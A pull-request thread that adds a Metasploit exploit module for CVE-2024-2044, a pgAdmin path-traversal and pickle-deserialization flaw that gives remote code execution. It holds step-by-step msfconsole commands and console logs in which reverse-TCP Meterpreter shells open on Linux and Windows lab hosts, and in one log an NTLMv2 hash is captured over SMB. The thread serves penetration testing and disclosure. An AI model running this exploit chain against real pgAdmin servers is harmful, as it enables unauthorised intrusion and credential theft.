Add exploit for CVE-2024-2044 (pgAdmin <= 8.3 RCE)

[zeroSteiner]

This adds an exploit for pgAdmin <= 8.3 which is a path traversal vulnerability in the session management that allows a Python pickle object to be loaded and deserialized. This also adds a new Python deserialization gadget chain to execute the code in a new thread so the target application doesn't block the HTTP request. I've added the source code for both the new one and the original as well to help future travelers tweak it as necessary.

Important notes from the exploit description:

This exploit supports two techniques by which the payload can be loaded, depending on whether or not credentials are specified. If valid credentials are provided, Metasploit will login to pgAdmin and upload a payload object using pgAdmin's file management plugin. Once uploaded, this payload is executed via the path traversal before being deleted using the file management plugin. This technique works for both Linux and Windows targets. If no credentials are provided, Metasploit will start an SMB server and attempt to trigger loading the payload via a UNC path. This technique only works for Windows targets. For Windows 10 v1709 (Redstone 3) and later, it also requires that insecure outbound guest access be enabled.

Tested on pgAdmin 8.3 on Linux, 7.7 on Linux, 7.0 on Linux, and 8.3 on Windows. The file management plugin underwent changes in the 6.x versions and therefor, pgAdmin versions < 7.0 can not utilize the authenticated technique whereby a payload is uploaded.

This requires the changes from:

• Handle SMB2 compound related requests ruby_smb#264

Verification

• Install the application
• Start msfconsole
• Do: use exploit/multi/http/pgadmin_session_deserialization
• Set the RHOST, PAYLOAD, and optionally the USERNAME and PASSWORD options
• Do: run

metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set RHOSTS 192.168.250.134
RHOSTS => 192.168.250.134
metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set RPORT 8080
RPORT => 8080
metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set SSL false
[!] Changing the SSL option's value may require changing RPORT!
SSL => false
metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set USERNAME user@gmail.com
USERNAME => user@gmail.com
metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set PASSWORD Password1!
PASSWORD => Password1!
metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set PAYLOAD python/meterpreter/reverse_tcp
PAYLOAD => python/meterpreter/reverse_tcp
metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > set LHOST 192.168.250.134
LHOST => 192.168.250.134
metasploit-framework (S:0 J:0) exploit(multi/http/pgadmin_session_deserialization) > run

[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] Triggering deserialization for path: ../storage/user_gmail.com/eos.json
[*] Sending stage (24768 bytes) to 192.168.250.134
[*] Meterpreter session 1 opened (192.168.250.134:4444 -> 192.168.250.134:45930) at 2024-03-29 12:01:04 -0400

meterpreter > getuid
Server username: pgadmin
meterpreter > sysinfo
Computer     : 27b165126272
OS           : Linux 6.7.9-200.fc39.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Mar  6 19:35:04 UTC 2024
Architecture : x64
Meterpreter  : python/linux
meterpreter > pwd
/pgadmin4
meterpreter > 

[jheysel-r7]

Great module. Thanks for supporting both exploit techniques! A couple minor suggestions. Testing was as expected:

Unix Authenticated

msf6 exploit(multi/http/pgadmin_session_deserialization) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. pgAdmin version 8.3.0 is affected
[*] Successfully authenticated to pgAdmin
[*] Serialized payload uploaded to: /var/lib/pgadmin/storage/metasploit_gmail.com/amet.ods
[*] Triggering deserialization for path: ../storage/metasploit_gmail.com/amet.ods
[*] Sending stage (24772 bytes) to 172.16.199.131
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.131:57444) at 2024-04-16 10:17:38 -0700

meterpreter > getuid
Server username: pgadmin
meterpreter > sysinfo
Computer     : 765d0319a1ea
OS           : Linux 6.2.0-35-generic #35~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Oct  6 10:23:26 UTC 2
Architecture : x64
Meterpreter  : python/linux
meterpreter >

Windows Authenticated

msf6 exploit(multi/http/pgadmin_session_deserialization) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. pgAdmin version 8.3.0 is affected
[*] Successfully authenticated to pgAdmin
[*] Serialized payload uploaded to: C:\Users\msfuser\AppData\Roaming\pgAdmin\storage\metasploit_gmail.com/omnis.odt
[*] Triggering deserialization for path: ../storage/metasploit_gmail.com/omnis.odt
[*] Sending stage (24772 bytes) to 172.16.199.135
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.135:51125) at 2024-04-16 09:23:54 -0700

meterpreter > getuid
Server username: CLIENT\msfuser
meterpreter > sysinfo
Computer        : client
OS              : Windows 10 (Build 19045)
Architecture    : x64
System Language : en_US
Meterpreter     : python/windows
meterpreter >

Windows Unauthenticated

msf6 exploit(multi/http/pgadmin_session_deserialization) > run

[*] Started reverse TCP handler on 172.16.199.1:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. pgAdmin version 8.3.0 is affected
[*] Server is running. Listening on 172.16.199.1:445
[*] The SMB service has been started.
[*] Triggering deserialization for path: \\172.16.199.1\fnhlW\ZPPl
[SMB] NTLMv2-SSP Client     : 172.16.199.135
[SMB] NTLMv2-SSP Username   : CLIENT\msfuser
[SMB] NTLMv2-SSP Hash       : msfuser::CLIENT:b7f1ecd023526627:ef207a721fee35176c118c141c94edb6:01010000000000000082c0861f90da01e6bf83043985b0b5000000000200120057004f0052004b00470052004f00550050000100120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000300120057004f0052004b00470052004f0055005000070008000082c0861f90da0106000400020000000800300030000000000000000000000000300000b7455226bdffbd4eedbd8019440e07a05e289b1820216fc4d1dadcb55556a42b0a001000000000000000000000000000000000000900220063006900660073002f003100370032002e00310036002e003100390039002e0031000000000000000000

[*] Sending stage (24772 bytes) to 172.16.199.135
[*] Meterpreter session 2 opened (172.16.199.1:5555 -> 172.16.199.135:49805) at 2024-04-16 10:00:06 -0700
[*] Server stopped.

meterpreter > getuid
Server username: CLIENT\msfuser
meterpreter > sysinfo
Computer        : client
OS              : Windows 10 (Build 19045)
Architecture    : x64
System Language : en_US
Meterpreter     : python/windows
meterpreter >

[jheysel-r7]

Release Notes

This adds an exploit for pgAdmin <= 8.3 which is a path traversal vulnerability in the session management that allows a Python pickle object to be loaded and deserialized. This also adds a new Python deserialization gadget chain to execute the code in a new thread so the target application doesn't block the HTTP request.